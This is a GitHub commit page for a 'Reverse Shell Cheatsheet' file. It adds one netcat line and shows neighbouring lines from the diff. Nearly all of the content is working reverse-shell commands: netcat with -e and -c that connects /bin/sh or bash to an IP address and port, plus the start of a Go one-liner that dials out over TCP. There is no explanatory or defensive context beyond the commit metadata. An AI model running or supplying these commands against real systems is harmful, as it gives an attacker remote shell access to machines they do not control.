Update Reverse Shell Cheatsheet.md

patch-1
Hi15358 2019-10-21 02:35:13 +08:00 committed by GitHub
parent ed252df92e
commit b54142c3a2
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 1 additions and 0 deletions

View File

@ -129,6 +129,7 @@ echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","
```bash
nc -e /bin/sh [IPADDR] [PORT]
nc.traditional -e /bin/bash 10.0.0.1 4444
nc -c bash 10.0.0.1 4444
```
### Netcat OpenBsd